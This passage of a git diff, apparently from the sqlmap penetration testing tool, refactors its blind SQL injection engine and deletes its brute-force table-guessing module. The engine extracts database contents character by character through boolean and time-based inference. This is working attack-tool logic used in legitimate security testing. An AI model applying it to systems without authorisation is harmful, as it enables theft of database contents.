conf.charset)) + else: + asciiTbl = getCharset(charsetType) + + threadData = getCurrentThreadData() + timeBasedCompare = (getTechnique() in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) retVal = hashDBRetrieve(expression, checkConf=True) if retVal: - if PARTIAL_HEX_VALUE_MARKER in retVal: + if conf.repair and INFERENCE_UNKNOWN_CHAR in retVal: + pass + elif PARTIAL_HEX_VALUE_MARKER in retVal: retVal = retVal.replace(PARTIAL_HEX_VALUE_MARKER, "") if retVal and conf.hexConvert: @@ -86,30 +111,51 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None return 0, retVal + if Backend.isDbms(DBMS.MCKOI): + match = re.search(r"\ASELECT\b(.+)\bFROM\b(.+)\Z", expression, re.I) + if match: + original = queries[Backend.getIdentifiedDbms()].inference.query + right = original.split('<')[1] + payload = payload.replace(right, "(SELECT %s FROM %s)" % (right, match.group(2).strip())) + expression = match.group(1).strip() + + elif Backend.isDbms(DBMS.FRONTBASE): + match = re.search(r"\ASELECT\b(\s+TOP\s*\([^)]+\)\s+)?(.+)\bFROM\b(.+)\Z", expression, re.I) + if match: + payload = payload.replace(INFERENCE_GREATER_CHAR, " FROM %s)%s" % (match.group(3).strip(), INFERENCE_GREATER_CHAR)) + payload = payload.replace("SUBSTRING", "(SELECT%sSUBSTRING" % (match.group(1) if match.group(1) else " "), 1) + expression = match.group(2).strip() + try: - # Set kb.partRun in case "common prediction" feature (a.k.a. "good - # samaritan") is used - kb.partRun = getPartRun() if conf.predictOutput else None + # Set kb.partRun in case "common prediction" feature (a.k.a. "good samaritan") is used or the engine is called from the API + if conf.predictOutput: + kb.partRun = getPartRun() + elif conf.api: + kb.partRun = getPartRun(alias=False) + else: + kb.partRun = None if partialValue: firstChar = len(partialValue) - elif "LENGTH(" in expression.upper() or "LEN(" in expression.upper(): + elif re.search(r"(?i)(\b|CHAR_)(LENGTH|LEN|COUNT)\(", expression): firstChar = 0 - elif dump and conf.firstChar is not None and (isinstance(conf.firstChar, int) or (isinstance(conf.firstChar, basestring) and conf.firstChar.isdigit())): + elif conf.firstChar is not None and (isinstance(conf.firstChar, int) or (hasattr(conf.firstChar, "isdigit") and conf.firstChar.isdigit())): firstChar = int(conf.firstChar) - 1 - elif firstChar is None: - firstChar = 0 - elif (isinstance(firstChar, basestring) and firstChar.isdigit()) or isinstance(firstChar, int): + if kb.fileReadMode: + firstChar <<= 1 + elif hasattr(firstChar, "isdigit") and firstChar.isdigit() or isinstance(firstChar, int): firstChar = int(firstChar) - 1 + else: + firstChar = 0 - if "LENGTH(" in expression.upper() or "LEN(" in expression.upper(): + if re.search(r"(?i)(\b|CHAR_)(LENGTH|LEN|COUNT)\(", expression): lastChar = 0 - elif dump and conf.lastChar is not None and (isinstance(conf.lastChar, int) or (isinstance(conf.lastChar, basestring) and conf.lastChar.isdigit())): + elif conf.lastChar is not None and (isinstance(conf.lastChar, int) or (hasattr(conf.lastChar, "isdigit") and conf.lastChar.isdigit())): lastChar = int(conf.lastChar) - elif lastChar in (None, "0"): - lastChar = 0 - elif (isinstance(lastChar, basestring) and lastChar.isdigit()) or isinstance(lastChar, int): + elif hasattr(lastChar, "isdigit") and lastChar.isdigit() or isinstance(lastChar, int): lastChar = int(lastChar) + else: + lastChar = 0 if Backend.getDbms(): _, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression) @@ -119,8 +165,10 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None else: expressionUnescaped = unescaper.escape(expression) - if length and isinstance(length, basestring) and length.isdigit(): + if isinstance(length, six.string_types) and isDigit(length) or isinstance(length, int): length = int(length) + else: + length = None if length == 0: return 0, "" @@ -128,85 +176,102 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None if length and (lastChar > 0 or firstChar > 0): length = min(length, lastChar or length) - firstChar + if length and length > MAX_BISECTION_LENGTH: + length = None + showEta = conf.eta and isinstance(length, int) - numThreads = min(conf.threads, length) + + if kb.bruteMode: + numThreads = 1 + else: + numThreads = min(conf.threads or 0, length or 0) or 1 if showEta: progress = ProgressBar(maxValue=length) - progressTime = [] - - if timeBasedCompare and conf.threads > 1: - warnMsg = "multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically" - singleTimeWarnMessage(warnMsg) if numThreads > 1: - if not timeBasedCompare: + if not timeBasedCompare or kb.forceThreads: debugMsg = "starting %d thread%s" % (numThreads, ("s" if numThreads > 1 else "")) logger.debug(debugMsg) else: numThreads = 1 - if conf.threads == 1 and not timeBasedCompare and not conf.predictOutput: + if conf.threads == 1 and not any((timeBasedCompare, conf.predictOutput)): warnMsg = "running in a single-thread mode. Please consider " warnMsg += "usage of option '--threads' for faster data retrieval" singleTimeWarnMessage(warnMsg) - if conf.verbose in (1, 2) and not showEta: - if isinstance(length, int) and conf.threads > 1: + if conf.verbose in (1, 2) and not any((showEta, conf.api, kb.bruteMode)): + if isinstance(length, int) and numThreads > 1: dataToStdout("[%s] [INFO] retrieved: %s" % (time.strftime("%X"), "_" * min(length, conf.progressWidth))) dataToStdout("\r[%s] [INFO] retrieved: " % time.strftime("%X")) else: dataToStdout("\r[%s] [INFO] retrieved: " % time.strftime("%X")) - hintlock = threading.Lock() - def tryHint(idx): - with hintlock: + with kb.locks.hint: hintValue = kb.hintValue - if hintValue is not None and len(hintValue) >= idx: - if Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.MAXDB, DBMS.DB2): + if payload is not None and len(hintValue or "") > 0 and len(hintValue) >= idx: + if "'%s'" % CHAR_INFERENCE_MARK in payload: posValue = hintValue[idx - 1] else: posValue = ord(hintValue[idx - 1]) - forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, posValue)) - result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) - incrementCounter(kb.technique) + markingValue = "'%s'" % CHAR_INFERENCE_MARK + unescapedCharValue = unescaper.escape("'%s'" % decodeIntToUnicode(posValue)) + forgedPayload = agent.extractPayload(payload) or "" + forgedPayload = forgedPayload.replace(markingValue, unescapedCharValue) + forgedPayload = safeStringFormat(forgedPayload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, posValue)) + result = Request.queryPage(agent.replacePayload(payload, forgedPayload), timeBasedCompare=timeBasedCompare, raise404=False) + incrementCounter(getTechnique()) if result: return hintValue[idx - 1] - with hintlock: - kb.hintValue = None + with kb.locks.hint: + kb.hintValue = "" return None def validateChar(idx, value): """ - Used in time-based inference (in case that original and retrieved - value are not equal there will be a deliberate delay). + Used in inference - in time-based SQLi if original and retrieved value are not equal there will be a deliberate delay """ - if CHAR_INFERENCE_MARK not in payload: - forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_NOT_EQUALS_CHAR), (expressionUnescaped, idx, value)) + threadData = getCurrentThreadData() + + validationPayload = re.sub(r"(%s.*?)%s(.*?%s)" % (PAYLOAD_DELIMITER, INFERENCE_GREATER_CHAR, PAYLOAD_DELIMITER), r"\g<1>%s\g<2>" % INFERENCE_NOT_EQUALS_CHAR, payload) + + if "'%s'" % CHAR_INFERENCE_MARK not in payload: + forgedPayload = safeStringFormat(validationPayload, (expressionUnescaped, idx, value)) else: # e.g.: ... > '%c' -> ... > ORD(..) markingValue = "'%s'" % CHAR_INFERENCE_MARK unescapedCharValue = unescaper.escape("'%s'" % decodeIntToUnicode(value)) - forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_NOT_EQUALS_CHAR), (expressionUnescaped, idx)).replace(markingValue, unescapedCharValue) + forgedPayload = validationPayload.replace(markingValue, unescapedCharValue) + forgedPayload = safeStringFormat(forgedPayload, (expressionUnescaped, idx)) + + result = not Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) + + if result and timeBasedCompare and getTechniqueData().trueCode: + result = threadData.lastCode == getTechniqueData().trueCode + if not result: + warnMsg = "detected HTTP code '%s' in validation phase is differing from expected '%s'" % (threadData.lastCode, getTechniqueData().trueCode) + singleTimeWarnMessage(warnMsg) - result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) - incrementCounter(kb.technique) + incrementCounter(getTechnique()) - return not result + return result - def getChar(idx, charTbl=None, continuousOrder=True, expand=charsetType is None, shiftTable=None): + def getChar(idx, charTbl=None, continuousOrder=True, expand=charsetType is None, shiftTable=None, retried=None): """ continuousOrder means that distance between each two neighbour's numerical values is exactly 1 """ + threadData = getCurrentThreadData() + result = tryHint(idx) if result: @@ -215,14 +280,20 @@ def getChar(idx, charTbl=None, continuousOrder=True, expand=charsetType is None, if charTbl is None: charTbl = type(asciiTbl)(asciiTbl) - originalTbl = type(asciiTbl)(charTbl) + originalTbl = type(charTbl)(charTbl) - if continuousOrder and shiftTable is None: + if kb.disableShiftTable: + shiftTable = None + elif continuousOrder and shiftTable is None: # Used for gradual expanding into unicode charspace - shiftTable = [2, 2, 3, 3, 5, 4] + shiftTable = [2, 2, 3, 3, 3] - if CHAR_INFERENCE_MARK in payload and ord('\n') in charTbl: - charTbl.remove(ord('\n')) + if "'%s'" % CHAR_INFERENCE_MARK in payload: + for char in ('\n', '\r'): + if ord(char) in charTbl: + if not isinstance(charTbl, list): + charTbl = list(charTbl) + charTbl.remove(ord(char)) if not charTbl: return None @@ -230,7 +301,7 @@ def getChar(idx, charTbl=None, continuousOrder=True, expand=charsetType is None, elif len(charTbl) == 1: forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, charTbl[0])) result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) - incrementCounter(kb.technique) + incrementCounter(getTechnique()) if result: return decodeIntToUnicode(charTbl[0]) @@ -238,41 +309,100 @@ def getChar(idx, charTbl=None, continuousOrder=True, expand=charsetType is None, return None maxChar = maxValue = charTbl[-1] - minChar = minValue = charTbl[0] + minValue = charTbl[0] + firstCheck = False + lastCheck = False + unexpectedCode = False + + if continuousOrder: + while len(charTbl) > 1: + position = None + + if charsetType is None: + if not firstCheck: + try: + try: + lastChar = [_ for _ in threadData.shared.value if _ is not None][-1] + except IndexError: + lastChar = None + else: + if 'a' <= lastChar <= 'z': + position = charTbl.index(ord('a') - 1) # 96 + elif 'A' <= lastChar <= 'Z': + position = charTbl.index(ord('A') - 1) # 64 + elif '0' <= lastChar <= '9': + position = charTbl.index(ord('0') - 1) # 47 + except ValueError: + pass + finally: + firstCheck = True + + elif not lastCheck and numThreads == 1: # not usable in multi-threading environment + if charTbl[(len(charTbl) >> 1)] < ord(' '): + try: + # favorize last char check if current value inclines toward 0 + position = charTbl.index(1) + except ValueError: + pass + finally: + lastCheck = True + + if position is None: + position = (len(charTbl) >> 1) + + posValue = charTbl[position] + falsePayload = None + + if "'%s'" % CHAR_INFERENCE_MARK not in payload: + forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx, posValue)) + falsePayload = safeStringFormat(payload, (expressionUnescaped, idx, RANDOM_INTEGER_MARKER)) + else: + # e.g.: ... > '%c' -> ... > ORD(..) + markingValue = "'%s'" % CHAR_INFERENCE_MARK + unescapedCharValue = unescaper.escape("'%s'" % decodeIntToUnicode(posValue)) + forgedPayload = payload.replace(markingValue, unescapedCharValue) + forgedPayload = safeStringFormat(forgedPayload, (expressionUnescaped, idx)) + falsePayload = safeStringFormat(payload, (expressionUnescaped, idx)).replace(markingValue, NULL) + + if timeBasedCompare: + if kb.responseTimeMode: + kb.responseTimePayload = falsePayload + else: + kb.responseTimePayload = None - while len(charTbl) != 1: - position = (len(charTbl) >> 1) - posValue = charTbl[position] + result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) - if CHAR_INFERENCE_MARK not in payload: - forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx, posValue)) - else: - # e.g.: ... > '%c' -> ... > ORD(..) - markingValue = "'%s'" % CHAR_INFERENCE_MARK - unescapedCharValue = unescaper.escape("'%s'" % decodeIntToUnicode(posValue)) - forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx)).replace(markingValue, unescapedCharValue) + incrementCounter(getTechnique()) - result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) - incrementCounter(kb.technique) + if not timeBasedCompare and getTechniqueData() is not None: + unexpectedCode |= threadData.lastCode not in (getTechniqueData().falseCode, getTechniqueData().trueCode) + if unexpectedCode: + if threadData.lastCode is not None: + warnMsg = "unexpected HTTP code '%s' detected." % threadData.lastCode + else: + warnMsg = "unexpected response detected." - if result: - minValue = posValue + warnMsg += " Will use (extra) validation step in similar cases" - if type(charTbl) != xrange: - charTbl = charTbl[position:] - else: - # xrange() - extended virtual charset used for memory/space optimization - charTbl = xrange(charTbl[position], charTbl[-1] + 1) - else: - maxValue = posValue + singleTimeWarnMessage(warnMsg) - if type(charTbl) != xrange: - charTbl = charTbl[:position] + if result: + minValue = posValue + + if not isinstance(charTbl, xrange): + charTbl = charTbl[position:] + else: + # xrange() - extended virtual charset used for memory/space optimization + charTbl = xrange(charTbl[position], charTbl[-1] + 1) else: - charTbl = xrange(charTbl[0], charTbl[position]) + maxValue = posValue - if len(charTbl) == 1: - if continuousOrder: + if not isinstance(charTbl, xrange): + charTbl = charTbl[:position] + else: + charTbl = xrange(charTbl[0], charTbl[position]) + + if len(charTbl) == 1: if maxValue == 1: return None @@ -285,35 +415,37 @@ def getChar(idx, charTbl=None, continuousOrder=True, expand=charsetType is None, # list if expand and shiftTable: charTbl = xrange(maxChar + 1, (maxChar + 1) << shiftTable.pop()) - originalTbl = xrange(charTbl) + originalTbl = xrange(charTbl[0], charTbl[-1] + 1) maxChar = maxValue = charTbl[-1] - minChar = minValue = charTbl[0] + minValue = charTbl[0] else: + kb.disableShiftTable = True return None else: retVal = minValue + 1 if retVal in originalTbl or (retVal == ord('\n') and CHAR_INFERENCE_MARK in payload): - if timeBasedCompare and not validateChar(idx, retVal): + if (timeBasedCompare or unexpectedCode) and not validateChar(idx, retVal): if not kb.originalTimeDelay: kb.originalTimeDelay = conf.timeSec - kb.timeValidCharsRun = 0 - if (conf.timeSec - kb.originalTimeDelay) < MAX_TIME_REVALIDATION_STEPS: + threadData.validationRun = 0 + if (retried or 0) < MAX_REVALIDATION_STEPS: errMsg = "invalid character detected. retrying.." logger.error(errMsg) - conf.timeSec += 1 + if timeBasedCompare: + if kb.adjustTimeDelay is not ADJUST_TIME_DELAY.DISABLE: + conf.timeSec += 1 + warnMsg = "increasing time delay to %d second%s" % (conf.timeSec, 's' if conf.timeSec > 1 else '') + logger.warning(warnMsg) - warnMsg = "increasing time delay to %d second%s " % (conf.timeSec, 's' if conf.timeSec > 1 else '') - logger.warn(warnMsg) + if kb.adjustTimeDelay is ADJUST_TIME_DELAY.YES: + dbgMsg = "turning off time auto-adjustment mechanism" + logger.debug(dbgMsg) + kb.adjustTimeDelay = ADJUST_TIME_DELAY.NO - if kb.adjustTimeDelay is ADJUST_TIME_DELAY.YES: - dbgMsg = "turning off time auto-adjustment mechanism" - logger.debug(dbgMsg) - kb.adjustTimeDelay = ADJUST_TIME_DELAY.NO - - return getChar(idx, originalTbl, continuousOrder, expand, shiftTable) + return getChar(idx, originalTbl, continuousOrder, expand, shiftTable, (retried or 0) + 1) else: errMsg = "unable to properly validate last character value ('%s').." % decodeIntToUnicode(retVal) logger.error(errMsg) @@ -321,8 +453,8 @@ def getChar(idx, charTbl=None, continuousOrder=True, expand=charsetType is None, return decodeIntToUnicode(retVal) else: if timeBasedCompare: - kb.timeValidCharsRun += 1 - if kb.adjustTimeDelay is ADJUST_TIME_DELAY.NO and kb.timeValidCharsRun > VALID_TIME_CHARS_RUN_THRESHOLD: + threadData.validationRun += 1 + if kb.adjustTimeDelay is ADJUST_TIME_DELAY.NO and threadData.validationRun > VALID_TIME_CHARS_RUN_THRESHOLD: dbgMsg = "turning back on time auto-adjustment mechanism" logger.debug(dbgMsg) kb.adjustTimeDelay = ADJUST_TIME_DELAY.YES @@ -330,39 +462,53 @@ def getChar(idx, charTbl=None, continuousOrder=True, expand=charsetType is None, return decodeIntToUnicode(retVal) else: return None - else: - if minValue == maxChar or maxValue == minChar: - return None + else: + if "'%s'" % CHAR_INFERENCE_MARK in payload and conf.charset: + errMsg = "option '--charset' is not supported on '%s'" % Backend.getIdentifiedDbms() + raise SqlmapUnsupportedFeatureException(errMsg) + + candidates = list(originalTbl) + bit = 0 + while len(candidates) > 1: + bits = {} + maxCandidate = max(candidates) + maxBits = maxCandidate.bit_length() if maxCandidate > 0 else 1 + + for candidate in candidates: + for bit in xrange(maxBits): + bits.setdefault(bit, 0) + if candidate & (1 << bit): + bits[bit] += 1 + else: + bits[bit] -= 1 - # If we are working with non-continuous elements, set - # both minValue and character afterwards are possible - # candidates - for retVal in (originalTbl[originalTbl.index(minValue)], originalTbl[originalTbl.index(minValue) + 1]): - forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, retVal)) - result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) - incrementCounter(kb.technique) + choice = sorted(bits.items(), key=lambda _: abs(_[1]))[0][0] + mask = 1 << choice - if result: - return decodeIntToUnicode(retVal) + forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, "&%d%s" % (mask, INFERENCE_GREATER_CHAR)), (expressionUnescaped, idx, 0)) + result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) + incrementCounter(getTechnique()) - return None + if result: + candidates = [_ for _ in candidates if _ & mask > 0] + else: + candidates = [_ for _ in candidates if _ & mask == 0] - def etaProgressUpdate(charTime, index): - if len(progressTime) <= ((length * 3) / 100): - eta = 0 - else: - midTime = sum(progressTime) / len(progressTime) - midTimeWithLatest = (midTime + charTime) / 2 - eta = midTimeWithLatest * (length - index) / conf.threads + bit += 1 - progressTime.append(charTime) - progress.update(index) - progress.draw(eta) + if candidates: + forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, candidates[0])) + result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) + incrementCounter(getTechnique()) - # Go multi-threading (--threads > 1) - if conf.threads > 1 and isinstance(length, int) and length > 1: - threadData = getCurrentThreadData() + if result: + if candidates[0] == 0: # Trailing zeros + return None + else: + return decodeIntToUnicode(candidates[0]) + # Go multi-threading (--threads > 1) + if numThreads > 1 and isinstance(length, int) and length > 1: threadData.shared.value = [None] * length threadData.shared.index = [firstChar] # As list for python nested function scoping threadData.shared.start = firstChar @@ -372,32 +518,31 @@ def blindThread(): threadData = getCurrentThreadData() while kb.threadContinue: - kb.locks.index.acquire() - - if threadData.shared.index[0] - firstChar >= length: - kb.locks.index.release() - - return + with kb.locks.index: + if threadData.shared.index[0] - firstChar >= length: + return - threadData.shared.index[0] += 1 - curidx = threadData.shared.index[0] - kb.locks.index.release() + threadData.shared.index[0] += 1 + currentCharIndex = threadData.shared.index[0] if kb.threadContinue: - charStart = time.time() - val = getChar(curidx) + val = getChar(currentCharIndex, asciiTbl, not (charsetType is None and conf.charset)) if val is None: val = INFERENCE_UNKNOWN_CHAR else: break + # NOTE: https://github.com/sqlmapproject/sqlmap/issues/4629 + if not isListLike(threadData.shared.value): + break + with kb.locks.value: - threadData.shared.value[curidx - 1 - firstChar] = val + threadData.shared.value[currentCharIndex - 1 - firstChar] = val currentValue = list(threadData.shared.value) if kb.threadContinue: if showEta: - etaProgressUpdate(time.time() - charStart, threadData.shared.index[0]) + progress.progress(threadData.shared.index[0]) elif conf.verbose >= 1: startCharIndex = 0 endCharIndex = 0 @@ -414,24 +559,24 @@ def blindThread(): count = threadData.shared.start for i in xrange(startCharIndex, endCharIndex + 1): - output += '_' if currentValue[i] is None else currentValue[i] + output += '_' if currentValue[i] is None else filterControlChars(currentValue[i] if len(currentValue[i]) == 1 else ' ', replacement=' ') for i in xrange(length): count += 1 if currentValue[i] is not None else 0 if startCharIndex > 0: - output = '..' + output[2:] + output = ".." + output[2:] if (endCharIndex - startCharIndex == conf.progressWidth) and (endCharIndex < length - 1): - output = output[:-2] + '..' + output = output[:-2] + ".." - if conf.verbose in (1, 2) and not showEta: + if conf.verbose in (1, 2) and not any((showEta, conf.api, kb.bruteMode)): _ = count - firstChar output += '_' * (min(length, conf.progressWidth) - len(output)) - status = ' %d/%d (%d%%)' % (_, length, round(100.0 * _ / length)) + status = ' %d/%d (%d%%)' % (_, length, int(100.0 * _ / length)) output += status if _ != length else " " * len(status) - dataToStdout("\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), filterControlChars(output))) + dataToStdout("\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), output)) runThreads(numThreads, blindThread, startThreadMsg=False) @@ -439,12 +584,13 @@ def blindThread(): abortedFlag = True finally: - value = [partialValue[_] if _ < len(partialValue) else threadData.shared.value[_] for _ in xrange(length)] + value = [_ for _ in partialValue] + value.extend(_ for _ in threadData.shared.value) infoMsg = None # If we have got one single character not correctly fetched it - # can mean that the connection to the target url was lost + # can mean that the connection to the target URL was lost if None in value: partialValue = "".join(value[:value.index(None)]) @@ -454,16 +600,16 @@ def blindThread(): finalValue = "".join(value) infoMsg = "\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), filterControlChars(finalValue)) - if conf.verbose in (1, 2) and not showEta and infoMsg: + if conf.verbose in (1, 2) and infoMsg and not any((showEta, conf.api, kb.bruteMode)): dataToStdout(infoMsg) # No multi-threading (--threads = 1) else: index = firstChar + threadData.shared.value = "" while True: index += 1 - charStart = time.time() # Common prediction feature (a.k.a. "good samaritan") # NOTE: to be used only when multi-threading is not set for @@ -477,20 +623,22 @@ def blindThread(): if commonValue is not None: # One-shot query containing equals commonValue testValue = unescaper.escape("'%s'" % commonValue) if "'" not in commonValue else unescaper.escape("%s" % commonValue, quote=False) - query = agent.prefixQuery(safeStringFormat("AND (%s) = %s", (expressionUnescaped, testValue))) + + query = getTechniqueData().vector + query = agent.prefixQuery(query.replace(INFERENCE_MARKER, "(%s)%s%s" % (expressionUnescaped, INFERENCE_EQUALS_CHAR, testValue))) query = agent.suffixQuery(query) + result = Request.queryPage(agent.payload(newValue=query), timeBasedCompare=timeBasedCompare, raise404=False) - incrementCounter(kb.technique) + incrementCounter(getTechnique()) # Did we have luck? if result: if showEta: - etaProgressUpdate(time.time() - charStart, len(commonValue)) - elif conf.verbose in (1, 2): + progress.progress(len(commonValue)) + elif conf.verbose in (1, 2) or conf.api: dataToStdout(filterControlChars(commonValue[index - 1:])) finalValue = commonValue - break # If there is a common pattern starting with partialValue, @@ -499,10 +647,13 @@ def blindThread(): # Substring-query containing equals commonPattern subquery = queries[Backend.getIdentifiedDbms()].substring.query % (expressionUnescaped, 1, len(commonPattern)) testValue = unescaper.escape("'%s'" % commonPattern) if "'" not in commonPattern else unescaper.escape("%s" % commonPattern, quote=False) - query = agent.prefixQuery(safeStringFormat("AND (%s) = %s", (subquery, testValue))) + + query = getTechniqueData().vector + query = agent.prefixQuery(query.replace(INFERENCE_MARKER, "(%s)=%s" % (subquery, testValue))) query = agent.suffixQuery(query) + result = Request.queryPage(agent.payload(newValue=query), timeBasedCompare=timeBasedCompare, raise404=False) - incrementCounter(kb.technique) + incrementCounter(getTechnique()) # Did we have luck? if result: @@ -521,45 +672,53 @@ def blindThread(): if not val: val = getChar(index, otherCharset, otherCharset == asciiTbl) else: - val = getChar(index, asciiTbl) + val = getChar(index, asciiTbl, not (charsetType is None and conf.charset)) - if val is None or (lastChar > 0 and index > lastChar): + if val is None: finalValue = partialValue break if kb.data.processChar: val = kb.data.processChar(val) - partialValue += val + threadData.shared.value = partialValue = partialValue + val if showEta: - etaProgressUpdate(time.time() - charStart, index) - elif conf.verbose in (1, 2): + progress.progress(index) + elif (conf.verbose in (1, 2) and not kb.bruteMode) or conf.api: dataToStdout(filterControlChars(val)) - # some DBMSes (e.g. Firebird, DB2, etc.) have issues with trailing spaces - if len(partialValue) > INFERENCE_BLANK_BREAK and partialValue[-INFERENCE_BLANK_BREAK:].isspace() and partialValue.strip(' ')[-1:] != '\n': + # Note: some DBMSes (e.g. Firebird, DB2, etc.) have issues with trailing spaces + if Backend.getIdentifiedDbms() in (DBMS.FIREBIRD, DBMS.DB2, DBMS.MAXDB, DBMS.DERBY, DBMS.FRONTBASE) and len(partialValue) > INFERENCE_BLANK_BREAK and partialValue[-INFERENCE_BLANK_BREAK:].isspace(): finalValue = partialValue[:-INFERENCE_BLANK_BREAK] break + elif charsetType and partialValue[-1:].isspace(): + finalValue = partialValue[:-1] + break + + if (lastChar > 0 and index >= lastChar): + finalValue = "" if length == 0 else partialValue + finalValue = finalValue.rstrip() if len(finalValue) > 1 else finalValue + partialValue = None + break except KeyboardInterrupt: abortedFlag = True finally: kb.prependFlag = False - kb.stickyLevel = None retrievedLength = len(finalValue or "") if finalValue is not None: - finalValue = decodeHexValue(finalValue) if conf.hexConvert else finalValue + finalValue = decodeDbmsHexValue(finalValue) if conf.hexConvert else finalValue hashDBWrite(expression, finalValue) elif partialValue: hashDBWrite(expression, "%s%s" % (PARTIAL_VALUE_MARKER if not conf.hexConvert else PARTIAL_HEX_VALUE_MARKER, partialValue)) - if conf.hexConvert and not abortedFlag: + if conf.hexConvert and not any((abortedFlag, conf.api, kb.bruteMode)): infoMsg = "\r[%s] [INFO] retrieved: %s %s\n" % (time.strftime("%X"), filterControlChars(finalValue), " " * retrievedLength) dataToStdout(infoMsg) else: - if conf.verbose in (1, 2) or showEta: + if conf.verbose in (1, 2) and not any((showEta, conf.api, kb.bruteMode)): dataToStdout("\n") if (conf.verbose in (1, 2) and showEta) or conf.verbose >= 3: @@ -573,7 +732,8 @@ def blindThread(): raise KeyboardInterrupt _ = finalValue or partialValue - return getCounter(kb.technique), safecharencode(_) if kb.safeCharEncode else _ + + return getCounter(getTechnique()), safecharencode(_) if kb.safeCharEncode else _ def queryOutputLength(expression, payload): """ @@ -583,14 +743,15 @@ def queryOutputLength(expression, payload): infoMsg = "retrieving the length of query output" logger.info(infoMsg) - lengthExprUnescaped = agent.forgeQueryOutputLength(expression) start = time.time() + + lengthExprUnescaped = agent.forgeQueryOutputLength(expression) count, length = bisection(payload, lengthExprUnescaped, charsetType=CHARSET_TYPE.DIGITS) - debugMsg = "performed %d queries in %d seconds" % (count, calculateDeltaSeconds(start)) + debugMsg = "performed %d quer%s in %.2f seconds" % (count, 'y' if count == 1 else "ies", calculateDeltaSeconds(start)) logger.debug(debugMsg) - if length == " ": + if isinstance(length, six.string_types) and length.isspace(): length = 0 return length diff --git a/lib/techniques/brute/__init__.py b/lib/techniques/brute/__init__.py deleted file mode 100644 index 9e1072a9c4f..00000000000 --- a/lib/techniques/brute/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/lib/techniques/brute/use.py b/lib/techniques/brute/use.py deleted file mode 100644 index d57284826d7..00000000000 --- a/lib/techniques/brute/use.py +++ /dev/null @@ -1,242 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import time - -from lib.core.common import clearConsoleLine -from lib.core.common import dataToStdout -from lib.core.common import filterListValue -from lib.core.common import getFileItems -from lib.core.common import Backend -from lib.core.common import getPageWordSet -from lib.core.common import hashDBWrite -from lib.core.common import randomInt -from lib.core.common import randomStr -from lib.core.common import safeStringFormat -from lib.core.common import safeSQLIdentificatorNaming -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.enums import DBMS -from lib.core.enums import HASHDB_KEYS -from lib.core.exception import SqlmapDataException -from lib.core.exception import SqlmapMissingMandatoryOptionException -from lib.core.settings import METADB_SUFFIX -from lib.core.settings import BRUTE_COLUMN_EXISTS_TEMPLATE -from lib.core.settings import BRUTE_TABLE_EXISTS_TEMPLATE -from lib.core.threads import getCurrentThreadData -from lib.core.threads import runThreads -from lib.request import inject - -def _addPageTextWords(): - wordsList = [] - - infoMsg = "adding words used on web page to the check list" - logger.info(infoMsg) - pageWords = getPageWordSet(kb.originalPage) - - for word in pageWords: - word = word.lower() - - if len(word) > 2 and not word[0].isdigit() and word not in wordsList: - wordsList.append(word) - - return wordsList - -def tableExists(tableFile, regex=None): - result = inject.checkBooleanExpression("%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), randomStr()))) - - if conf.db and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - conf.db = conf.db.upper() - - if result: - errMsg = "can't use table existence check because of detected invalid results " - errMsg += "(most probably caused by inability of the used injection " - errMsg += "to distinguish errornous results)" - raise SqlmapDataException(errMsg) - - tables = getFileItems(tableFile, lowercase=Backend.getIdentifiedDbms() in (DBMS.ACCESS,), unique=True) - - infoMsg = "checking table existence using items from '%s'" % tableFile - logger.info(infoMsg) - - tables.extend(_addPageTextWords()) - tables = filterListValue(tables, regex) - - threadData = getCurrentThreadData() - threadData.shared.count = 0 - threadData.shared.limit = len(tables) - threadData.shared.value = [] - threadData.shared.unique = set() - - def tableExistsThread(): - threadData = getCurrentThreadData() - - while kb.threadContinue: - kb.locks.count.acquire() - if threadData.shared.count < threadData.shared.limit: - table = 